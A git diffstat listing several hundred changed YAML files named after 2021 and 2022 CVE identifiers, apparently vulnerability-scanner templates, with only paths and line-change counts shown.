http/cves/2021/CVE-2021-24970.yaml | 5 +++-- http/cves/2021/CVE-2021-24979.yaml | 5 +++-- http/cves/2021/CVE-2021-24987.yaml | 5 +++-- http/cves/2021/CVE-2021-24991.yaml | 6 +++--- http/cves/2021/CVE-2021-24997.yaml | 5 +++-- http/cves/2021/CVE-2021-25003.yaml | 5 +++-- http/cves/2021/CVE-2021-25008.yaml | 6 +++--- http/cves/2021/CVE-2021-25016.yaml | 6 +++--- http/cves/2021/CVE-2021-25028.yaml | 5 +++-- http/cves/2021/CVE-2021-25033.yaml | 5 +++-- http/cves/2021/CVE-2021-25052.yaml | 6 +++--- http/cves/2021/CVE-2021-25055.yaml | 6 +++--- http/cves/2021/CVE-2021-25063.yaml | 6 +++--- http/cves/2021/CVE-2021-25065.yaml | 5 +++-- http/cves/2021/CVE-2021-25067.yaml | 5 +++-- http/cves/2021/CVE-2021-25074.yaml | 5 +++-- http/cves/2021/CVE-2021-25075.yaml | 6 +++--- http/cves/2021/CVE-2021-25078.yaml | 5 +++-- http/cves/2021/CVE-2021-25079.yaml | 5 +++-- http/cves/2021/CVE-2021-25085.yaml | 5 +++-- http/cves/2021/CVE-2021-25099.yaml | 5 +++-- http/cves/2021/CVE-2021-25104.yaml | 6 +++--- http/cves/2021/CVE-2021-25111.yaml | 5 +++-- http/cves/2021/CVE-2021-25112.yaml | 6 +++--- http/cves/2021/CVE-2021-25114.yaml | 5 +++-- http/cves/2021/CVE-2021-25118.yaml | 5 +++-- http/cves/2021/CVE-2021-25120.yaml | 6 +++--- http/cves/2021/CVE-2021-25281.yaml | 2 +- http/cves/2021/CVE-2021-25296.yaml | 6 +++--- http/cves/2021/CVE-2021-25297.yaml | 6 +++--- http/cves/2021/CVE-2021-25298.yaml | 4 ++-- http/cves/2021/CVE-2021-25299.yaml | 5 +++-- http/cves/2021/CVE-2021-25646.yaml | 2 +- http/cves/2021/CVE-2021-25864.yaml | 2 +- http/cves/2021/CVE-2021-25899.yaml | 2 +- http/cves/2021/CVE-2021-26084.yaml | 2 +- http/cves/2021/CVE-2021-26085.yaml | 2 +- http/cves/2021/CVE-2021-26086.yaml | 2 +- http/cves/2021/CVE-2021-26247.yaml | 5 +++-- http/cves/2021/CVE-2021-26295.yaml | 2 +- http/cves/2021/CVE-2021-26475.yaml | 5 +++-- http/cves/2021/CVE-2021-26598.yaml | 6 +++--- http/cves/2021/CVE-2021-26702.yaml | 5 +++-- http/cves/2021/CVE-2021-26710.yaml | 5 +++-- http/cves/2021/CVE-2021-26723.yaml | 2 +- http/cves/2021/CVE-2021-26812.yaml | 5 +++-- http/cves/2021/CVE-2021-26855.yaml | 2 +- http/cves/2021/CVE-2021-27132.yaml | 5 +++-- http/cves/2021/CVE-2021-27309.yaml | 5 +++-- http/cves/2021/CVE-2021-27310.yaml | 5 +++-- http/cves/2021/CVE-2021-27320.yaml | 2 +- http/cves/2021/CVE-2021-27330.yaml | 2 +- http/cves/2021/CVE-2021-27358.yaml | 2 +- http/cves/2021/CVE-2021-27519.yaml | 5 +++-- http/cves/2021/CVE-2021-27520.yaml | 5 +++-- http/cves/2021/CVE-2021-27561.yaml | 4 ++-- http/cves/2021/CVE-2021-27651.yaml | 5 +++-- http/cves/2021/CVE-2021-27850.yaml | 2 +- http/cves/2021/CVE-2021-27905.yaml | 2 +- http/cves/2021/CVE-2021-27909.yaml | 5 +++-- http/cves/2021/CVE-2021-27931.yaml | 2 +- http/cves/2021/CVE-2021-28149.yaml | 2 +- http/cves/2021/CVE-2021-28150.yaml | 5 +++-- http/cves/2021/CVE-2021-28151.yaml | 2 +- http/cves/2021/CVE-2021-28169.yaml | 5 +++-- http/cves/2021/CVE-2021-28377.yaml | 5 +++-- http/cves/2021/CVE-2021-28419.yaml | 5 +++-- http/cves/2021/CVE-2021-28918.yaml | 2 +- http/cves/2021/CVE-2021-28937.yaml | 2 +- http/cves/2021/CVE-2021-29006.yaml | 6 +++--- http/cves/2021/CVE-2021-29203.yaml | 2 +- http/cves/2021/CVE-2021-29442.yaml | 2 +- http/cves/2021/CVE-2021-29484.yaml | 2 +- http/cves/2021/CVE-2021-29490.yaml | 5 +++-- http/cves/2021/CVE-2021-29505.yaml | 2 +- http/cves/2021/CVE-2021-29622.yaml | 5 +++-- http/cves/2021/CVE-2021-29625.yaml | 5 +++-- http/cves/2021/CVE-2021-3002.yaml | 5 +++-- http/cves/2021/CVE-2021-30049.yaml | 5 +++-- http/cves/2021/CVE-2021-30128.yaml | 2 +- http/cves/2021/CVE-2021-30134.yaml | 7 ++++--- http/cves/2021/CVE-2021-30151.yaml | 2 +- http/cves/2021/CVE-2021-3017.yaml | 5 +++-- http/cves/2021/CVE-2021-30175.yaml | 2 +- http/cves/2021/CVE-2021-3019.yaml | 2 +- http/cves/2021/CVE-2021-30213.yaml | 5 +++-- http/cves/2021/CVE-2021-30461.yaml | 4 ++-- http/cves/2021/CVE-2021-30497.yaml | 4 ++-- http/cves/2021/CVE-2021-3110.yaml | 2 +- http/cves/2021/CVE-2021-31195.yaml | 2 +- http/cves/2021/CVE-2021-31249.yaml | 5 +++-- http/cves/2021/CVE-2021-31250.yaml | 2 +- http/cves/2021/CVE-2021-31537.yaml | 5 +++-- http/cves/2021/CVE-2021-31581.yaml | 5 +++-- http/cves/2021/CVE-2021-31589.yaml | 5 +++-- http/cves/2021/CVE-2021-31602.yaml | 2 +- http/cves/2021/CVE-2021-31682.yaml | 5 +++-- http/cves/2021/CVE-2021-31755.yaml | 2 +- http/cves/2021/CVE-2021-31805.yaml | 2 +- http/cves/2021/CVE-2021-31856.yaml | 2 +- http/cves/2021/CVE-2021-31862.yaml | 5 +++-- http/cves/2021/CVE-2021-32030.yaml | 2 +- http/cves/2021/CVE-2021-32172.yaml | 5 +++-- http/cves/2021/CVE-2021-3223.yaml | 2 +- http/cves/2021/CVE-2021-32305.yaml | 2 +- http/cves/2021/CVE-2021-32618.yaml | 5 +++-- http/cves/2021/CVE-2021-32682.yaml | 2 +- http/cves/2021/CVE-2021-32789.yaml | 2 +- http/cves/2021/CVE-2021-32819.yaml | 2 +- http/cves/2021/CVE-2021-32820.yaml | 2 +- http/cves/2021/CVE-2021-32853.yaml | 7 ++++--- http/cves/2021/CVE-2021-3293.yaml | 5 +++-- http/cves/2021/CVE-2021-3297.yaml | 2 +- http/cves/2021/CVE-2021-33221.yaml | 2 +- http/cves/2021/CVE-2021-33357.yaml | 2 +- http/cves/2021/CVE-2021-33564.yaml | 2 +- http/cves/2021/CVE-2021-3374.yaml | 5 +++-- http/cves/2021/CVE-2021-3377.yaml | 5 +++-- http/cves/2021/CVE-2021-3378.yaml | 2 +- http/cves/2021/CVE-2021-33807.yaml | 2 +- http/cves/2021/CVE-2021-33851.yaml | 5 +++-- http/cves/2021/CVE-2021-33904.yaml | 5 +++-- http/cves/2021/CVE-2021-34370.yaml | 5 +++-- http/cves/2021/CVE-2021-34429.yaml | 2 +- http/cves/2021/CVE-2021-34621.yaml | 6 +++--- http/cves/2021/CVE-2021-34640.yaml | 6 +++--- http/cves/2021/CVE-2021-34643.yaml | 6 +++--- http/cves/2021/CVE-2021-34805.yaml | 2 +- http/cves/2021/CVE-2021-35250.yaml | 2 +- http/cves/2021/CVE-2021-35265.yaml | 5 +++-- http/cves/2021/CVE-2021-35323.yaml | 5 +++-- http/cves/2021/CVE-2021-35336.yaml | 2 +- http/cves/2021/CVE-2021-35380.yaml | 2 +- http/cves/2021/CVE-2021-35395.yaml | 2 +- http/cves/2021/CVE-2021-35464.yaml | 4 ++-- http/cves/2021/CVE-2021-35488.yaml | 5 +++-- http/cves/2021/CVE-2021-35587.yaml | 2 +- http/cves/2021/CVE-2021-3577.yaml | 5 +++-- http/cves/2021/CVE-2021-36260.yaml | 4 ++-- http/cves/2021/CVE-2021-36356.yaml | 2 +- http/cves/2021/CVE-2021-36450.yaml | 5 +++-- http/cves/2021/CVE-2021-3654.yaml | 2 +- http/cves/2021/CVE-2021-36580.yaml | 5 +++-- http/cves/2021/CVE-2021-36748.yaml | 5 +++-- http/cves/2021/CVE-2021-36749.yaml | 2 +- http/cves/2021/CVE-2021-36873.yaml | 5 +++-- http/cves/2021/CVE-2021-37216.yaml | 5 +++-- http/cves/2021/CVE-2021-37304.yaml | 2 +- http/cves/2021/CVE-2021-37305.yaml | 5 +++-- http/cves/2021/CVE-2021-37416.yaml | 5 +++-- http/cves/2021/CVE-2021-37538.yaml | 5 +++-- http/cves/2021/CVE-2021-37573.yaml | 2 +- http/cves/2021/CVE-2021-37580.yaml | 2 +- http/cves/2021/CVE-2021-37589.yaml | 6 +++--- http/cves/2021/CVE-2021-37704.yaml | 5 +++-- http/cves/2021/CVE-2021-37833.yaml | 5 +++-- http/cves/2021/CVE-2021-38314.yaml | 5 +++-- http/cves/2021/CVE-2021-38540.yaml | 6 +++--- http/cves/2021/CVE-2021-38647.yaml | 4 ++-- http/cves/2021/CVE-2021-38702.yaml | 2 +- http/cves/2021/CVE-2021-38704.yaml | 5 +++-- http/cves/2021/CVE-2021-38751.yaml | 5 +++-- http/cves/2021/CVE-2021-39141.yaml | 2 +- http/cves/2021/CVE-2021-39144.yaml | 2 +- http/cves/2021/CVE-2021-39146.yaml | 2 +- http/cves/2021/CVE-2021-39152.yaml | 2 +- http/cves/2021/CVE-2021-39165.yaml | 2 +- http/cves/2021/CVE-2021-39211.yaml | 5 +++-- http/cves/2021/CVE-2021-39226.yaml | 2 +- http/cves/2021/CVE-2021-39312.yaml | 5 +++-- http/cves/2021/CVE-2021-39316.yaml | 3 ++- http/cves/2021/CVE-2021-39320.yaml | 6 +++--- http/cves/2021/CVE-2021-39322.yaml | 6 +++--- http/cves/2021/CVE-2021-39327.yaml | 4 ++-- http/cves/2021/CVE-2021-39350.yaml | 6 +++--- http/cves/2021/CVE-2021-39433.yaml | 5 +++-- http/cves/2021/CVE-2021-39501.yaml | 5 +++-- http/cves/2021/CVE-2021-40149.yaml | 5 +++-- http/cves/2021/CVE-2021-40150.yaml | 2 +- http/cves/2021/CVE-2021-40323.yaml | 2 +- http/cves/2021/CVE-2021-40438.yaml | 4 ++-- http/cves/2021/CVE-2021-40542.yaml | 5 +++-- http/cves/2021/CVE-2021-40661.yaml | 5 +++-- http/cves/2021/CVE-2021-40856.yaml | 2 +- http/cves/2021/CVE-2021-40859.yaml | 2 +- http/cves/2021/CVE-2021-40868.yaml | 5 +++-- http/cves/2021/CVE-2021-40870.yaml | 2 +- http/cves/2021/CVE-2021-40875.yaml | 5 +++-- http/cves/2021/CVE-2021-40908.yaml | 2 +- http/cves/2021/CVE-2021-40960.yaml | 2 +- http/cves/2021/CVE-2021-40968.yaml | 5 +++-- http/cves/2021/CVE-2021-40969.yaml | 5 +++-- http/cves/2021/CVE-2021-40970.yaml | 5 +++-- http/cves/2021/CVE-2021-40971.yaml | 5 +++-- http/cves/2021/CVE-2021-40972.yaml | 5 +++-- http/cves/2021/CVE-2021-40973.yaml | 2 +- http/cves/2021/CVE-2021-40978.yaml | 2 +- http/cves/2021/CVE-2021-41174.yaml | 2 +- http/cves/2021/CVE-2021-41192.yaml | 5 +++-- http/cves/2021/CVE-2021-41266.yaml | 2 +- http/cves/2021/CVE-2021-41277.yaml | 5 +++-- http/cves/2021/CVE-2021-41282.yaml | 5 +++-- http/cves/2021/CVE-2021-41291.yaml | 2 +- http/cves/2021/CVE-2021-41293.yaml | 2 +- http/cves/2021/CVE-2021-41349.yaml | 4 ++-- http/cves/2021/CVE-2021-41432.yaml | 5 +++-- http/cves/2021/CVE-2021-41460.yaml | 2 +- http/cves/2021/CVE-2021-41467.yaml | 5 +++-- http/cves/2021/CVE-2021-41569.yaml | 2 +- http/cves/2021/CVE-2021-41648.yaml | 5 +++-- http/cves/2021/CVE-2021-41649.yaml | 2 +- http/cves/2021/CVE-2021-41691.yaml | 3 ++- http/cves/2021/CVE-2021-41749.yaml | 4 ++-- http/cves/2021/CVE-2021-41773.yaml | 2 +- http/cves/2021/CVE-2021-41826.yaml | 2 +- http/cves/2021/CVE-2021-41878.yaml | 5 +++-- http/cves/2021/CVE-2021-4191.yaml | 2 +- http/cves/2021/CVE-2021-41951.yaml | 2 +- http/cves/2021/CVE-2021-42063.yaml | 5 +++-- http/cves/2021/CVE-2021-42071.yaml | 2 +- http/cves/2021/CVE-2021-42192.yaml | 8 ++++---- http/cves/2021/CVE-2021-42258.yaml | 5 +++-- http/cves/2021/CVE-2021-42551.yaml | 5 +++-- http/cves/2021/CVE-2021-42565.yaml | 5 +++-- http/cves/2021/CVE-2021-42566.yaml | 5 +++-- http/cves/2021/CVE-2021-42567.yaml | 2 +- http/cves/2021/CVE-2021-42627.yaml | 2 +- http/cves/2021/CVE-2021-42663.yaml | 5 +++-- http/cves/2021/CVE-2021-42667.yaml | 5 +++-- http/cves/2021/CVE-2021-42887.yaml | 2 +- http/cves/2021/CVE-2021-43062.yaml | 2 +- http/cves/2021/CVE-2021-43287.yaml | 2 +- http/cves/2021/CVE-2021-43421.yaml | 5 +++-- http/cves/2021/CVE-2021-43495.yaml | 2 +- http/cves/2021/CVE-2021-43496.yaml | 4 ++-- http/cves/2021/CVE-2021-43510.yaml | 5 +++-- http/cves/2021/CVE-2021-43574.yaml | 5 +++-- http/cves/2021/CVE-2021-43725.yaml | 5 +++-- http/cves/2021/CVE-2021-43734.yaml | 2 +- http/cves/2021/CVE-2021-43778.yaml | 2 +- http/cves/2021/CVE-2021-43798.yaml | 2 +- http/cves/2021/CVE-2021-43810.yaml | 5 +++-- http/cves/2021/CVE-2021-44077.yaml | 2 +- http/cves/2021/CVE-2021-44138.yaml | 7 ++++--- http/cves/2021/CVE-2021-44139.yaml | 2 +- http/cves/2021/CVE-2021-44152.yaml | 2 +- http/cves/2021/CVE-2021-44427.yaml | 4 ++-- http/cves/2021/CVE-2021-44451.yaml | 5 +++-- http/cves/2021/CVE-2021-44515.yaml | 2 +- http/cves/2021/CVE-2021-44528.yaml | 5 +++-- http/cves/2021/CVE-2021-44529.yaml | 2 +- http/cves/2021/CVE-2021-44848.yaml | 2 +- http/cves/2021/CVE-2021-45043.yaml | 2 +- http/cves/2021/CVE-2021-45092.yaml | 2 +- http/cves/2021/CVE-2021-45232.yaml | 4 ++-- http/cves/2021/CVE-2021-45380.yaml | 5 +++-- http/cves/2021/CVE-2021-45382.yaml | 2 +- http/cves/2021/CVE-2021-45422.yaml | 5 +++-- http/cves/2021/CVE-2021-45428.yaml | 6 +++--- http/cves/2021/CVE-2021-45967.yaml | 2 +- http/cves/2021/CVE-2021-45968.yaml | 5 +++-- http/cves/2021/CVE-2021-46005.yaml | 6 +++--- http/cves/2021/CVE-2021-46068.yaml | 5 +++-- http/cves/2021/CVE-2021-46069.yaml | 5 +++-- http/cves/2021/CVE-2021-46071.yaml | 5 +++-- http/cves/2021/CVE-2021-46072.yaml | 5 +++-- http/cves/2021/CVE-2021-46073.yaml | 5 +++-- http/cves/2021/CVE-2021-46107.yaml | 5 +++-- http/cves/2021/CVE-2021-46379.yaml | 5 +++-- http/cves/2021/CVE-2021-46381.yaml | 2 +- http/cves/2021/CVE-2021-46387.yaml | 5 +++-- http/cves/2021/CVE-2021-46417.yaml | 2 +- http/cves/2021/CVE-2021-46422.yaml | 2 +- http/cves/2021/CVE-2021-46424.yaml | 6 +++--- http/cves/2021/CVE-2021-46704.yaml | 2 +- http/cves/2022/CVE-2022-0140.yaml | 2 +- http/cves/2022/CVE-2022-0147.yaml | 6 +++--- http/cves/2022/CVE-2022-0148.yaml | 6 +++--- http/cves/2022/CVE-2022-0149.yaml | 6 +++--- http/cves/2022/CVE-2022-0150.yaml | 5 +++-- http/cves/2022/CVE-2022-0165.yaml | 5 +++-- http/cves/2022/CVE-2022-0169.yaml | 2 +- http/cves/2022/CVE-2022-0189.yaml | 6 +++--- http/cves/2022/CVE-2022-0201.yaml | 5 +++-- http/cves/2022/CVE-2022-0206.yaml | 5 +++-- http/cves/2022/CVE-2022-0208.yaml | 5 +++-- http/cves/2022/CVE-2022-0212.yaml | 5 +++-- http/cves/2022/CVE-2022-0218.yaml | 2 +- http/cves/2022/CVE-2022-0220.yaml | 5 +++-- http/cves/2022/CVE-2022-0228.yaml | 7 ++++--- http/cves/2022/CVE-2022-0234.yaml | 5 +++-- http/cves/2022/CVE-2022-0271.yaml | 5 +++-- http/cves/2022/CVE-2022-0281.yaml | 5 +++-- http/cves/2022/CVE-2022-0288.yaml | 5 +++-- http/cves/2022/CVE-2022-0342.yaml | 2 +- http/cves/2022/CVE-2022-0346.yaml | 5 +++-- http/cves/2022/CVE-2022-0349.yaml | 4 ++-- http/cves/2022/CVE-2022-0378.yaml | 5 +++-- http/cves/2022/CVE-2022-0381.yaml | 5 +++-- http/cves/2022/CVE-2022-0412.yaml | 2 +- http/cves/2022/CVE-2022-0415.yaml | 8 ++++---- http/cves/2022/CVE-2022-0422.yaml | 5 +++-- http/cves/2022/CVE-2022-0432.yaml | 5 +++-- http/cves/2022/CVE-2022-0434.yaml | 5 +++-- http/cves/2022/CVE-2022-0437.yaml | 6 +++--- http/cves/2022/CVE-2022-0441.yaml | 8 ++++---- http/cves/2022/CVE-2022-0482.yaml | 8 ++++---- http/cves/2022/CVE-2022-0533.yaml | 5 +++-- http/cves/2022/CVE-2022-0535.yaml | 6 +++--- http/cves/2022/CVE-2022-0540.yaml | 4 ++-- http/cves/2022/CVE-2022-0591.yaml | 5 +++-- http/cves/2022/CVE-2022-0594.yaml | 7 ++++--- http/cves/2022/CVE-2022-0595.yaml | 5 +++-- http/cves/2022/CVE-2022-0597.yaml | 5 +++-- http/cves/2022/CVE-2022-0599.yaml | 6 +++--- http/cves/2022/CVE-2022-0651.yaml | 3 ++- http/cves/2022/CVE-2022-0653.yaml | 5 +++-- http/cves/2022/CVE-2022-0656.yaml | 5 +++-- http/cves/2022/CVE-2022-0658.yaml | 5 +++-- http/cves/2022/CVE-2022-0660.yaml | 5 +++-- http/cves/2022/CVE-2022-0678.yaml | 5 +++-- http/cves/2022/CVE-2022-0679.yaml | 2 +- http/cves/2022/CVE-2022-0692.yaml | 5 +++-- http/cves/2022/CVE-2022-0693.yaml | 2 +- http/cves/2022/CVE-2022-0735.yaml | 2 +- http/cves/2022/CVE-2022-0747.yaml | 2 +- http/cves/2022/CVE-2022-0760.yaml | 2 +- http/cves/2022/CVE-2022-0769.yaml | 2 +- http/cves/2022/CVE-2022-0773.yaml | 7 ++++--- http/cves/2022/CVE-2022-0776.yaml | 5 +++-- http/cves/2022/CVE-2022-0781.yaml | 2 +- http/cves/2022/CVE-2022-0784.yaml | 5 +++-- http/cves/2022/CVE-2022-0785.yaml | 2 +- http/cves/2022/CVE-2022-0786.yaml | 4 ++-- http/cves/2022/CVE-2022-0787.yaml | 13 ++++++++++--- http/cves/2022/CVE-2022-0788.yaml | 2 +- http/cves/2022/CVE-2022-0814.yaml | 3 ++- http/cves/2022/CVE-2022-0817.yaml | 3 ++- http/cves/2022/CVE-2022-0824.yaml | 6 +++--- http/cves/2022/CVE-2022-0826.yaml | 3 ++- http/cves/2022/CVE-2022-0827.yaml | 4 ++-- http/cves/2022/CVE-2022-0846.yaml | 5 +++-- http/cves/2022/CVE-2022-0864.yaml | 6 +++--- http/cves/2022/CVE-2022-0869.yaml | 5 +++-- http/cves/2022/CVE-2022-0870.yaml | 6 +++--- http/cves/2022/CVE-2022-0885.yaml | 4 ++-- http/cves/2022/CVE-2022-0899.yaml | 7 ++++--- http/cves/2022/CVE-2022-0928.yaml | 5 +++-- http/cves/2022/CVE-2022-0948.yaml | 5 +++-- http/cves/2022/CVE-2022-0949.yaml | 5 +++-- http/cves/2022/CVE-2022-0952.yaml | 7 ++++--- http/cves/2022/CVE-2022-0954.yaml | 5 +++-- http/cves/2022/CVE-2022-0963.yaml | 5 +++-- http/cves/2022/CVE-2022-0968.yaml | 5 +++-- http/cves/2022/CVE-2022-1007.yaml | 5 +++-- http/cves/2022/CVE-2022-1013.yaml | 5 +++-- http/cves/2022/CVE-2022-1020.yaml | 2 +- http/cves/2022/CVE-2022-1040.yaml | 2 +- http/cves/2022/CVE-2022-1054.yaml | 3 ++- http/cves/2022/CVE-2022-1057.yaml | 2 +- http/cves/2022/CVE-2022-1058.yaml | 5 +++-- http/cves/2022/CVE-2022-1119.yaml | 2 +- http/cves/2022/CVE-2022-1162.yaml | 4 ++-- http/cves/2022/CVE-2022-1168.yaml | 5 +++-- http/cves/2022/CVE-2022-1170.yaml | 5 +++-- http/cves/2022/CVE-2022-1221.yaml | 5 +++-- http/cves/2022/CVE-2022-1329.yaml | 10 +++++----- http/cves/2022/CVE-2022-1386.yaml | 8 ++++---- http/cves/2022/CVE-2022-1388.yaml | 4 ++-- http/cves/2022/CVE-2022-1390.yaml | 5 +++-- http/cves/2022/CVE-2022-1391.yaml | 2 +- http/cves/2022/CVE-2022-1392.yaml | 2 +- http/cves/2022/CVE-2022-1398.yaml | 8 ++++---- http/cves/2022/CVE-2022-1439.yaml | 5 +++-- http/cves/2022/CVE-2022-1442.yaml | 4 ++-- http/cves/2022/CVE-2022-1574.yaml | 5 +++-- http/cves/2022/CVE-2022-1595.yaml | 7 ++++--- http/cves/2022/CVE-2022-1597.yaml | 5 +++-- http/cves/2022/CVE-2022-1598.yaml | 2 +- http/cves/2022/CVE-2022-1713.yaml | 4 ++-- http/cves/2022/CVE-2022-1724.yaml | 7 ++++--- http/cves/2022/CVE-2022-1756.yaml | 7 ++++--- http/cves/2022/CVE-2022-1768.yaml | 7 ++++--- http/cves/2022/CVE-2022-1815.yaml | 2 +- http/cves/2022/CVE-2022-1883.yaml | 2 +- http/cves/2022/CVE-2022-1903.yaml | 4 ++-- http/cves/2022/CVE-2022-1904.yaml | 5 +++-- http/cves/2022/CVE-2022-1906.yaml | 5 +++-- http/cves/2022/CVE-2022-1910.yaml | 7 ++++--- http/cves/2022/CVE-2022-1916.yaml | 5 +++-- http/cves/2022/CVE-2022-1933.yaml | 5 +++-- http/cves/2022/CVE-2022-1937.yaml | 5 +++-- http/cves/2022/CVE-2022-1946.yaml | 5 +++-- http/cves/2022/CVE-2022-1952.yaml | 3 ++- http/cves/2022/CVE-2022-2034.yaml | 2 +- http/cves/2022/CVE-2022-21371.yaml | 2 +- http/cves/2022/CVE-2022-21500.yaml | 2 +- http/cves/2022/CVE-2022-21587.yaml | 2 +- http/cves/2022/CVE-2022-21661.yaml | 2 +- http/cves/2022/CVE-2022-21705.yaml | 5 ++--- http/cves/2022/CVE-2022-2174.yaml | 5 +++-- http/cves/2022/CVE-2022-2185.yaml | 2 +- http/cves/2022/CVE-2022-2187.yaml | 5 +++-- http/cves/2022/CVE-2022-2219.yaml | 5 +++-- http/cves/2022/CVE-2022-22242.yaml | 2 +- http/cves/2022/CVE-2022-22536.yaml | 2 +- http/cves/2022/CVE-2022-22733.yaml | 4 ++-- http/cves/2022/CVE-2022-22897.yaml | 2 +- http/cves/2022/CVE-2022-2290.yaml | 5 +++-- http/cves/2022/CVE-2022-22954.yaml | 2 +- http/cves/2022/CVE-2022-22972.yaml | 5 +++-- http/cves/2022/CVE-2022-23102.yaml | 5 +++-- http/cves/2022/CVE-2022-23131.yaml | 2 +- http/cves/2022/CVE-2022-23134.yaml | 4 ++-- http/cves/2022/CVE-2022-2314.yaml | 6 +++--- http/cves/2022/CVE-2022-23178.yaml | 3 ++- http/cves/2022/CVE-2022-23347.yaml | 2 +- http/cves/2022/CVE-2022-23348.yaml | 2 +- http/cves/2022/CVE-2022-23544.yaml | 7 ++++--- http/cves/2022/CVE-2022-2373.yaml | 5 +++-- http/cves/2022/CVE-2022-2376.yaml | 2 +- http/cves/2022/CVE-2022-23779.yaml | 5 +++-- http/cves/2022/CVE-2022-2379.yaml | 5 +++-- http/cves/2022/CVE-2022-23808.yaml | 5 +++-- http/cves/2022/CVE-2022-2383.yaml | 5 +++-- http/cves/2022/CVE-2022-23854.yaml | 4 ++-- http/cves/2022/CVE-2022-23881.yaml | 4 ++-- http/cves/2022/CVE-2022-23898.yaml | 5 +++-- http/cves/2022/CVE-2022-23944.yaml | 5 +++-- http/cves/2022/CVE-2022-24112.yaml | 6 +++--- http/cves/2022/CVE-2022-24124.yaml | 5 +++-- http/cves/2022/CVE-2022-24129.yaml | 5 +++-- http/cves/2022/CVE-2022-2414.yaml | 5 +++-- http/cves/2022/CVE-2022-24181.yaml | 5 +++-- http/cves/2022/CVE-2022-24223.yaml | 2 +- http/cves/2022/CVE-2022-24260.yaml | 2 +- http/cves/2022/CVE-2022-24264.yaml | 6 +++--- http/cves/2022/CVE-2022-24265.yaml | 5 +++-- http/cves/2022/CVE-2022-24266.yaml | 5 +++-- http/cves/2022/CVE-2022-24288.yaml | 2 +- http/cves/2022/CVE-2022-24384.yaml | 5 +++-- http/cves/2022/CVE-2022-2462.yaml | 2 +- http/cves/2022/CVE-2022-2467.yaml | 5 +++-- http/cves/2022/CVE-2022-24681.yaml | 5 +++-- http/cves/2022/CVE-2022-24716.yaml | 4 ++-- http/cves/2022/CVE-2022-24816.yaml | 2 +- http/cves/2022/CVE-2022-24856.yaml | 4 ++-- http/cves/2022/CVE-2022-2486.yaml | 2 +- http/cves/2022/CVE-2022-2487.yaml | 2 +- http/cves/2022/CVE-2022-24899.yaml | 4 ++-- http/cves/2022/CVE-2022-24900.yaml | 2 +- http/cves/2022/CVE-2022-24990.yaml | 2 +- http/cves/2022/CVE-2022-25082.yaml | 2 +- http/cves/2022/CVE-2022-25125.yaml | 5 +++-- http/cves/2022/CVE-2022-25148.yaml | 2 +- http/cves/2022/CVE-2022-25149.yaml | 3 ++- http/cves/2022/CVE-2022-25216.yaml | 5 +++-- http/cves/2022/CVE-2022-25323.yaml | 5 +++-- http/cves/2022/CVE-2022-2535.yaml | 5 +++-- http/cves/2022/CVE-2022-25356.yaml | 5 +++-- http/cves/2022/CVE-2022-2544.yaml | 5 +++-- http/cves/2022/CVE-2022-2546.yaml | 5 +++-- http/cves/2022/CVE-2022-25481.yaml | 2 +- http/cves/2022/CVE-2022-25485.yaml | 5 +++-- http/cves/2022/CVE-2022-25486.yaml | 5 +++-- http/cves/2022/CVE-2022-25487.yaml | 2 +- http/cves/2022/CVE-2022-25488.yaml | 2 +- http/cves/2022/CVE-2022-25489.yaml | 5 +++-- http/cves/2022/CVE-2022-25497.yaml | 5 +++-- http/cves/2022/CVE-2022-2551.yaml | 2 +- http/cves/2022/CVE-2022-25568.yaml | 2 +- http/cves/2022/CVE-2022-2599.yaml | 6 +++--- http/cves/2022/CVE-2022-26134.yaml | 3 ++- http/cves/2022/CVE-2022-26138.yaml | 2 +- http/cves/2022/CVE-2022-26148.yaml | 5 +++-- http/cves/2022/CVE-2022-26159.yaml | 2 +- http/cves/2022/CVE-2022-26233.yaml | 7 ++++--- http/cves/2022/CVE-2022-26263.yaml | 5 +++-- http/cves/2022/CVE-2022-2627.yaml | 5 +++-- http/cves/2022/CVE-2022-2633.yaml | 5 +++-- http/cves/2022/CVE-2022-26352.yaml | 3 ++- http/cves/2022/CVE-2022-26564.yaml | 5 +++-- http/cves/2022/CVE-2022-26833.yaml | 2 +- http/cves/2022/CVE-2022-26960.yaml | 2 +- http/cves/2022/CVE-2022-2733.yaml | 6 +++--- http/cves/2022/CVE-2022-2756.yaml | 5 +++-- http/cves/2022/CVE-2022-27593.yaml | 2 +- http/cves/2022/CVE-2022-27849.yaml | 5 +++-- http/cves/2022/CVE-2022-27926.yaml | 4 ++-- http/cves/2022/CVE-2022-27927.yaml | 4 ++-- http/cves/2022/CVE-2022-27984.yaml | 5 +++-- http/cves/2022/CVE-2022-27985.yaml | 6 +++--- http/cves/2022/CVE-2022-28022.yaml | 5 +++-- http/cves/2022/CVE-2022-28023.yaml | 5 +++-- http/cves/2022/CVE-2022-28032.yaml | 5 +++-- http/cves/2022/CVE-2022-28079.yaml | 4 ++-- http/cves/2022/CVE-2022-28080.yaml | 8 ++++---- http/cves/2022/CVE-2022-28117.yaml | 6 +++--- http/cves/2022/CVE-2022-28219.yaml | 4 ++-- http/cves/2022/CVE-2022-28290.yaml | 5 +++-- http/cves/2022/CVE-2022-28363.yaml | 5 +++-- http/cves/2022/CVE-2022-28365.yaml | 2 +- http/cves/2022/CVE-2022-2863.yaml | 6 +++--- http/cves/2022/CVE-2022-28923.yaml | 2 +- http/cves/2022/CVE-2022-28955.yaml | 4 ++-- http/cves/2022/CVE-2022-29004.yaml | 6 +++--- http/cves/2022/CVE-2022-29005.yaml | 5 +++-- http/cves/2022/CVE-2022-29006.yaml | 6 +++--- http/cves/2022/CVE-2022-29007.yaml | 6 +++--- http/cves/2022/CVE-2022-29009.yaml | 6 +++--- http/cves/2022/CVE-2022-29014.yaml | 5 +++-- http/cves/2022/CVE-2022-29153.yaml | 5 +++-- http/cves/2022/CVE-2022-29272.yaml | 7 ++++--- http/cves/2022/CVE-2022-29303.yaml | 2 +- http/cves/2022/CVE-2022-29383.yaml | 5 +++-- http/cves/2022/CVE-2022-29455.yaml | 7 ++++--- http/cves/2022/CVE-2022-29464.yaml | 7 ++++--- http/cves/2022/CVE-2022-29548.yaml | 5 +++-- http/cves/2022/CVE-2022-29775.yaml | 2 +- http/cves/2022/CVE-2022-30073.yaml | 8 ++++---- http/cves/2022/CVE-2022-30489.yaml | 5 +++-- http/cves/2022/CVE-2022-30512.yaml | 5 +++-- http/cves/2022/CVE-2022-30513.yaml | 5 +++-- http/cves/2022/CVE-2022-30514.yaml | 5 +++-- http/cves/2022/CVE-2022-3062.yaml | 5 +++-- http/cves/2022/CVE-2022-30776.yaml | 5 +++-- http/cves/2022/CVE-2022-30777.yaml | 7 ++++--- http/cves/2022/CVE-2022-31126.yaml | 2 +- 